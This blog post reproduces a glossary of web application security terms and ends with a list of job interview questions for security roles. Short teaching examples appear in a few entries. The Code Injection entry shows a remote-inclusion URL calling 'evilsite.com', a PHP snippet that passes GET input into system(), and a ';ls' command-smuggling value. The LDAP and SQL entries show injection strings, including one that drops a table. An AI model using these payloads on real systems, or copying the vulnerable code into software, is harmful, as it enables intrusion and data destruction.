• Updating the windows tool installed.
•

Posted by atlurianupama at 01:54 2 comments:

Email ThisBlogThis!Share to TwitterShare to FacebookShare to Pinterest

1.13.7 Important Security Terminology

Abuse of Functionality: An attack technique that uses the features and
functionality of a web site to consume, defraud, or circumvent the site’s access
controls. See also “Denial of Service”.
ActiveX controls: A program, called a “control”, developed using ActiveX controls
technologies. ActiveX controls controls can be downloaded and executed within
technology-enabled Web browsers. ActiveX controls is a set of rules for how
applications should share information. ActiveX controls controls can be developed in
C, C++, Visual Basic, and Java. See also “Java”, “Java Applets”, “JavaScript”, “Web
Browser”.
AJAX: AJAX stands for Asynchronous JavaScript and XML. This browser based
technology allows a website to perform additional resource requests without
refreshing the user page by utilizing the XMLHttpRequest Javascript object.
Anti-Automation: Security measure that prevents automated programs from
exercising web site functionality by administering the Turing Test to a user, which
only a human could pass. See also “Visual Verification”.
Application Server: A software server, normally using HTTP, which has the ability
to execute dynamic web applications. Also known a middleware, this piece of
software is normally installed on or near the web server where it can be called upon.
See also “Web Application”, “Web Server”.
Authentication: The process of verifying the identity or location of a user, service
or application. Authentication is performed using at least one of three mechanisms:
“something you have”, “something you know” or “something you are”. The
authenticating application may provide different services based on the location,
access method, time of day, etc. See also “Insufficient Authentication”.
Authorization: The determination of what resources a user, service or application
has permission to access. Accessible resources can be URL’s, files, directories,
servlets, databases, execution paths, etc. See also “Insufficient Authorization”.
Basic Authentication: A simple form of client-side authentication supported in
HTTP. The http-client sends a request header to the web server containing a Base64
encoded username and password. If the username/password combination is valid,
the web server grants the client access to the requested resource. See also
“Authentication”, “Insufficient Authentication”.
Brute Force: An automated process of trial and error used to guess the “secret”
protecting a system. Examples of these secrets include usernames, passwords or
cryptographic keys. See also “Authentication”, “Insufficient Authentication”,
“Password Recover System”, “Weak Password Recovery Validation”.
Buffer Overflow: An exploitation technique that alters the flow of an application by
overwriting parts of memory. Buffer Overflows are a common cause of
malfunctioning software. If the data written into a buffer exceeds its size, adjacent
memory space will be corrupted and normally produce a fault. An attacker may be
able to utilize a buffer overflow situation to alter an application´s process flow.
Overfilling the buffer and rewriting memory-stack pointers could be used to execute
arbitrary operating-system commands.
CGI Scanner: Automated security program that searches for well-known
vulnerabilities in web servers and off-the-shelf web application software. Often CGI
Scanners are not very “stateful” in their analysis and only test a series HTTP
requests against known CGI strings. See also, “Web Application Vulnerability
Scanner.”
CGI Security: (Obsolete) See “Web Application Security”.
Client-Side Scripting: Web browser feature that extends the functionality and
interactivity of static HyperText markup language (HTML) web pages. Examples of
Client-Side Scripting languages are JavaScript, JScript and VBScript. See also
“ActiveX controls”, “Java Applets”.
Common Gateway Interface: (Acronym - CGI) Programming standard for software
to interface and execute applications residing on web servers. See also “Web
Application”, “Application Server”, “Web Server”.
Configuration File Disclosure: (Obsolete) See “Predictable File Location”.
Content Spoofing: An attack technique used to trick a user into thinking that fake
web site content is legitimate data.
Cookie: Small amount of data sent by the web server, to a web client, which can be
stored and retrieved at a later time. Typically cookies are used to keep track of a
user’s state as they traverse a web site. See also “Cookie Manipulation”.
Cookie Manipulation: Altering or modification of cookie values, on the client’s web
browser, to exploit security issues within a web application. Attackers will normally
manipulate cookie values to fraudulently authenticate themselves to a web site. This
is an example of the problem of trusting the user to provide reasonable input. See
also “Cookie”.
Code Injection is the general name for a lot of types of attacks which depend on
inserting code, which is interprated by the application. Such an attack may be be
performed by adding strings of characters into a cookie or argument values in the
URI. This attack makes use of lack of accurate input/output data validation, for
example:
Example 1
If a site uses the include() function, which operates on variables sent with the GET method, and
there is no validation performed on them, then the attacker may try to execute different code other
than the author of the code had in mind.
The URL below displays information about how to contact with the testsite company.
http://testsite.com/index.php?page=contact.php
Below the altered code is code from http://evilsite.com/evilcode.php. The script "evilcode.php"
may contain, for example, a phpinfo() function, which is useful for gaining information about the
configuration of the environment in which the web service runs.
http://testsite.com/?page=http://evilsite.com/evilcode.php
Example 3
<?php
$varerror = system('cat '.$_GET['pageid'], $valoretorno);
echo $varerror;
?>
by using that kind of code we can attak as show in example number 2
using live http headers or using method get you can make this kind of petition:
vulnerable.php?pageid=loquesea;ls
ls is the command we are executing but we can use any other commands of the server.
Cookie Poisoning: (Obsolete) See “Cookie Manipulation”.
Cross-Site Scripting: (Acronym – XSS) An attack technique that forces a web site
to echo client-supplied data, which execute in a user’s web browser. When a user is
Cross-Site Scripted, the attacker will have access to all web browser content
(cookies, history, application version, etc). See also “Client-Side Scripting”.
Debug Commands: Application debugging features or commands that assist in
identifying programming errors during the software development process.
Denial of Service: (Acronym – DoS) An attack technique that consumes all of a
web site’s available resources with the intent of rendering legitimate use impossible.
Resources include CPU time, memory utilization, bandwidth, disk space, etc. When
any of these resources reach full capacity, the system will normally be inaccessible to
normal user activity. See also “Abuse of Functionality”.
Directory Browsing: (Obsolete) See “Directory Indexing”.
Directory Enumeration: (Obsolete) See “Predictable File Location”.
Directory Indexing: A feature common to most popular web servers, that exposes
contents of a directory when no index page is present. See also “Predictable File
Location”.
Directory Traversal: A technique used to exploit web sites by accessing files and
commands beyond the document root directory. Most web sites restrict user access
to a specific portion of the file-system, typically called the document root directory or
CGI root directory. These directories contain the files and executables intended for
public use. In most cases, a user should not be able to access any files beyond this
point.
DOM Based Cross Site Scrpiting: DOM based cross-site scripting (or "DOM based
XSS" in short) is a “cross-site scripting” attack that makes use of insecure Javascript
(or in general - client side) programming that takes place in response pages, to
effectively incur an XSS condition. In DOM based XSS, the attacker affects the
Javascript execution in a target page (in the attacked domain) by providing it with
data in the URL or the Referer, which the script insecurely uses. The script may apply
the eval() function to the malicious data, or embed it in the DOM (thus making the
browser potentially render it as Javascript and run it). This is in contrast to
"standard" XSS, where the malicious data is embedded to the page at the server
side. In some cases, DOM based XSS can even be conducted in such way that the
malicious payload doesn´t even reach the server, which makes this attack more
unobtrusive.
Encoding Attacks: An exploitation technique that aids an attack by changing the
format of user-supplied data to bypass sanity checking filters. See also “Null
Injection”.
Filename Manipulation: An attack technique used to exploit web sites by
manipulating URL filenames to cause application errors, discover hidden content, or
display the source code of an application. See also “Predictable File Location”.
Filter-Bypass Manipulation: See “Encoding Attacks”.
Forced Browsing: See “Predictable File Location”.
Form Field Manipulation: Altering or modification of HTML Form-Field input values
or HTTP post-data to exploit security issues within a web application. See also
“Parameter Tampering”, “Cookie Manipulation”.
Format String Attack: An exploit technique that alters the flow of an application by
using string formatting library features to access other memory space.
Frame Spoofing: (Obsolete) See “Content Spoofing”.
HyperText Transfer Protocol: (Acronym – HTTP) A protocol scheme used on the
World Wide Web. HTTP describes the way a web-client requests data and how a web
server responds to those requests. See also “Web Server”, “Web Browser”.
HTTP Request Smuggling: HTTP Request Smuggling works by taking advantage of
the discrepancies in parsing when one or more HTTP devices/entities (e.g. cache
server, proxy server, web application firewall, etc.) are in the data flow between the
user and the web server. HTTP Request Smuggling enables various attacks “web
cache poisoning”, “session hijacking”, “cross-site scripting” as well as the ability to
bypass web application firewall protection. The attacker sends multiple specially-
crafted HTTP requests that cause the two attacked entities (e.g. a proxy server and a
web server, or a firewall and a web server) to see two different sets of requests,
allowing the hacker to smuggle a request to one device without the other device
being aware of it.
HTTP Response Smuggling: HTTP response smuggling is an enhancement of the
basic “HTTP response splitting” technique, which can evade anti- HTTP response
splitting measures. HTTP response smuggling makes use of “HTTP request
smuggling”-like techniques to exploit the discrepancies between what an anti- HTTP
Response Splitting mechanism would consider to be the HTTP response stream, and
the response stream as parsed by a proxy server (or a browser). So, while an anti-
HTTP response splitting mechanism may consider a particular response stream
harmless (single HTTP response), a proxy/browser may still parse it as two HTTP
responses, and hence be susceptible to all the outcomes of the original HTTP
response splitting technique. For example, some anti- HTTP response splitting
mechanisms in use by some application engines forbid the application from inserting
a header containing CR+LF to the response. Yet an attacker can force the application
to insert a header containing CRs, thereby circumventing the defense mechanism.
Some proxy servers may still treat CR (only) as a header (and response) separator,
and as such the combination of web server and proxy server will still be vulnerable to
an attack that may poison the proxy´s cache.
HTTP Response Splitting: An HTTP response splitting attack causes the web server
to send out two HTTP responses, where it typically only sends out one HTTP
response (hence the name - "response splitting"). This can be described as HTTP
response injection, and is typically conducted by injecting malicious data into an
HTTP response header, and using CR+LF characters to shape and terminate the first
response, and then completely shape and control the additional response. Having
this second, "unexpected" response enables the attacker to fool a client that receives
this extra response by forcing this client to first emit a second request. The client
then matches the second, attacker-controlled response to the second, attacker-
controlled request. The net result (looking at the second request-response pair) is
that the client is forced to send an arbitrary request to the vulnerable server, and in
response, the client receives an arbitrary response crafted by the attacker. This
condition enables “cross-site scripting” and “cache poisoning”.
Information Leakage: When a web site reveals sensitive data, such as developer
comments or error messages, which aids an attacker in exploiting the system. See
also “Verbose Messages”.
Insufficient Authentication: When a web site permits an attacker to access
sensitive content or functionality without verifying their identity. See also
“Authentication”.
Insufficient Authorization: When a web site permits an attacker to access
sensitive content or functionality that should require increased access control
restrictions. See also “Authorization”.
Insufficient Session Expiration: When a web site permits an attacker to reuse old
session credentials or session ID’s for authorization. See also “Session Replay”,
“Session Credential”, “Session ID”, “Session Manipulation”.
Insufficient Process Validation: When a web site permits an attacker to bypass or
circumvent the intended flow control of an application.
Java: A popular programming language developed by Sun Microsystems(tm). See
also “ActiveX controls”, “Web Browser”, “JavaScript”, “Client-Side Scripting”.
Java Applets: An applet is a program written in the Java programming language
that can be included in a web page. When a Java enabled web browser views a page
containing an applet, the code is executed by the Java Virtual Machine (JVM). See
also “Web Browser”, “Java”, “ActiveX controls”, “JavaScript”, “Client-Side Scripting”.
Java Script: A popular web browser client-side scripting language used to create
dynamic web page content. See also “Active X”, “Java Applets”, “Client-Side
Scripting”.
Known CGI file: See “Predictable File Location”.
Known Directory: See “Predictable File Location”.
LDAP Injection: A technique for exploiting a web site by altering backend LDAP
statements through manipulating application input. Similarly to the methodology of
SQL Injection. See also “Parameter Tampering”, “Form Field Manipulation”.
Example 1
In a page with a user search form, the following code is responsible to catch input value
and generate a LDAP query that will be used in LDAP database.
 <input type="text" size=20 name="userName">Insert the username</input>
The LDAP query is narrowed down for performance and the underlying code for this
function might be the following:
String ldapSearchQuery = "(cn=" + $userName + ")";
System.out.println(ldapSearchQuery);
If the variable $userName is not validated, it could be possible accomplish LDAP
injection, as follows:
• If a user puts “*” on box search, the system may return all the usernames on the LDAP
base
• If a user puts “jonys) (| (password = * ) )”, it will generate the code bellow revealing
jonys’ password ( cn = jonys ) ( | (password = * ) )
Meta-Character Injection: An attack technique used to exploit web sites by
sending in meta-characters, which have special meaning to a web application, as
data input. Meta-characters are characters that have special meaning to
programming languages, operating system commands, individual program
procedures, database queries, etc. These special characters can adversely alter the
behavior of a web application. See also “Null Injection”, “Parameter Tampering”,
“SQL Injection”, “LDAP Injection”, “Cross-Site Scripting”.
Null Injection: An exploitation technique used to bypass sanity checking filters by
adding URL encoded null-byte characters to user-supplied data. When developers
create web applications in a variety of programming languages, these web
applications often pass data to underlying lower level C-functions for further
processing and functionality. If a user-supplied string contains a null character (\0),
the web application may stop processing the string at the point of the null. Null
Injection is a form of a meta-character Injection attack. See also “Encoding Attacks”,
“Parameter Tampering”, “Meta Character Injection”.
OS Command Injection: See “OS Commanding”.
OS Commanding: An attack technique used to exploit web sites by executing
operating-system commands through manipulating application input. See also
“Parameter Tampering”, “Form Field Manipulation”.
Page Sequencing: (Obsolete) See “Insufficient Process Validation”.
Parameter Tampering: Altering or modification of the parameter name and value
pairs in a URL. Also known as “URL Manipulation”. See also “Uniform Resource
Locator”.
Password Recovery System: An automated process that allows a user to recover
or reset his password in the event that it has been lost or forgotten. See also “Weak
Password Recovery Validation”.
Predictable File Location: A technique used to access hidden web site content or
functionality by making educated guesses, manually or automatically, of the names
and locations of files. Predictable file locations may include directories, CGI’s,
configuration files, backup files, temporary files, etc.
Secure Sockets Layer: (Acronym – SSL) An industry standard public-key protocol
used to create encrypted tunnels between two network-connected devices. See also
“Transport Layer Security”.
Session Credential: A string of data provided by the web server, normally stored
within a cookie or URL, which identifies a user and authorizes them to perform
various actions. See also “Session ID”.
Session Fixation: An attack technique that forces a user’s session credential or
session ID to an explicit value. See also “Session Credential”, “Session ID”.
Session Forging: See “Session Prediction”.
Session Hi-Jacking: The result of a user’s session being compromised by an
attacker. The attacker could reuse this stolen session to masquerade as the user.
See also “Session Prediction”, “Session Credential”, “Session ID”.
Session ID: A string of data provided by the web server, normally stored within a
cookie or URL. A Session ID tracks a user’s session, or perhaps just his current
session, as he traverse the web site.
Session Manipulation: An attack technique used to hi-jack another user’s session
by altering a session ID or session credential value. See also “Session Prediction”,
“Session Hi-Jacking”, “Session Credential”, “Session ID”.
Session Prediction: An attack technique used to create fraudulent session
credentials or guess other user’s current session ID’s. If successful, an attacker could
reuse this stolen session to masquerade as another user. See also “Session
Credential”, “Session ID”, “Session Hi-Jacking”.
Session Replay: When a web site permits an attacker to reuse old session
credentials or session ID’s for authorization. See also “Session ID”, “Session
Credential”, “Insufficient Session Expiration”.
Session Tampering: See “Session Manipulation”
SQL Injection: An attack technique used to exploit web sites by altering backend
SQL statements through manipulating application input. See also “Parameter
Tampering”, “Form Field Manipulation”
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo
WHERE 't' = 't';

SSI Injection: A server-side exploit technique that allows an attacker to send code
into a web application, which will be executed by the web server. See also "Meta-
Character Injection", “Parameter Tampering”, “Form Field Manipulation”.
Transport Layer Security: (Acronym – TLS) The more secure successor to SSL.
The TLS protocol provides communications privacy over the Internet. The protocol
allows client/server applications to communicate in a way that is designed to prevent
eavesdropping, tampering, or message forgery. TLS is based on the SSL protocol,
but the two systems are not interoperable. See also “Secure Sockets Layer”.
Universal Resource Locator: (Acronym – URL) A standard way of specifying the
location of an object, normally a web page, on the Internet. See also “Parameter
Tampering”.
Unvalidated Input: When a web application does not properly sanity-check user-
supplied data input.
URL Manipulation: Altering or modification of a web applications parameter name
and value pairs. Also known as “Parameter Tampering”.
User-Agent Manipulation: A technique used to bypass web site browser
requirement restrictions by altering the value sent within an HTTP User-Agent
header. See also “Cookie Manipulation”.
Verbose Messages: Detailed pieces of information revealed by a web site, which
could aid an attacker in exploiting the system.
Visual Verification: Visual oriented method of anti-automation that prevents
automated programs from exercising web site functionality by determining if there is
presence of mind. See also “Anti-Automation”.
Weak Password Recovery Validation: When a web site permits an attacker to
illegally obtain, change or recover another user’s password. See also “Password
Recovery System”.
Web Application: A software application, executed by a web server, which responds
to dynamic web page requests over HTTP. See also “Web Server”, “Web Application”,
“Web Service”.
Web Application Scanner: See “Web Application Vulnerability Scanner”.
Web Application Security: Science of information security relating to the World
Wide Web, HTTP and web application software. Also known as “Web Security”.
Web Application Firewall: An intermediary device, sitting between a web-client
and a web server, analyzing OSI Layer-7 messages for violations in the programmed
security policy. A web application firewall is used as a security device protecting the
web server from attack. See also “Web Application Security”, “Web Server”.
Web Application Vulnerability Scanner: An automated security program that
searches for software vulnerabilities within web applications. See also “Web
Application Security”.
Web Browser: A program used to display HyperText markup language (HTML) web
pages sent by a web server. See also “ActiveX controls”, “Cookie”, “Java Applets”,
“JavaScript”, “Client-Side Scripting”.
Web (or browser) cache poisoning: The act of adding/overwriting a cache entry
(of a caching proxy server, or a browser) with forged and possibly malicious data is
called cache poisoning. In its most potent form, an attacker can force an arbitrary
entry (URL of choice, page contents of choice) to the cache. In HTTP response
splitting [LINK], the attacker can choose the URL´s path and query (the host, port
and scheme must be the vulnerable host´s), and the entire page contents. In HTTP
request smuggling, the attacker can choose URL as in HTTP response splitting, but
the page contents must be obtained from a URL on the site. At any rate, cache
poisoning can be considered a form of defacement, whose scope is determined by
the coverage of the cache (i.e. browser - 1 user, forward proxy - 1 ISP/organization,
reverse proxy - all users), and the strength of the attack (full page control over
/index.html vs. partial control).
Web Security: See “Web Application Security”.
Web Security Assessment: A process of performing a security review of a web
application by searching for design flaws, vulnerabilities and inherent weaknesses.
See also “Web Application Security”.
Web Security Scanner: See “Web Application Vulnerability Scanner”.
Web Server: A general-purpose software application that handles and responds to
HTTP requests. A web server may utilize a web application for dynamic web page
content. See also “Web Application”, “Application Server”, “HyperText Transfer
Protocol”.
Web Service: A software application that uses Extensible Markup Language (XML)
formatted messages to communicate over HTTP. Typically, software applications
interact with web services rather than normal users. See also “Web Server”, “Web
Application”, “Application Server”, “HyperText Transfer Protocol”.

General Questions
Q) Why do you want to work for us?
Q) What will you bring to the team?
Q) Have you looked at our website? (Always do research on the company, be able to ask
them question about services)
Q) Where do you want to be in five years time?
Q) What are your main strengths and weaknesses?
Q) Tell me about yourself?
Q) Describe a situation in which you lead a team?
Q) Describe a situation where you worked in a team?
Q) What has been your greatest achievement?
Q) What are your hobbies?
Q) What motivates you?

Technical Questions
Q) Which service runs on port
22,80,21,25,137,3306,156,443,79,1,111,53,135,445,139,161,389,3368,123,110,3269,636,
500,4500 ?
Q) What is SQL injection?
Q) What is XSS?
Q) What are Private IP address?
Q) Which is the difference between Encryption,Hasing and Encoding?
Q) Where do you get your security news?
Q) What’s the difference between Symmetric and Asymettric?
Q) What is the proper sequence of a TCP connection?
Q) What type of password attack would be most successful against the password
T63#s23A?
Q) What is a logic bomb virus?
Q) What are the seven layers of the ISO model?
Q) What command is used to retrieve information from a SQL database?
Q) WEP stands for what?
Q) Data encrypted with the server’s public key can be decrypted with which key?
Q) What are the flags in a TCP header?
Q) What are three insecure protocols?
Q) What’s the difference between TCP and UDP?
Q) What does the Ike scan tool do?
Q) What does APT stand for?
Q) What does ICMP stand for and what does it do?
Q) What are the top ten security vulnerabilities in PHP code?
Q) What is a null session?
Q) What the difference between windows 2000 and NT?
Q) How does nmap tell if a UDP is open or closed?
Q) What is a bufff overflow?
Q) How would you enumerate SMTP?
Q) How does LM hash work?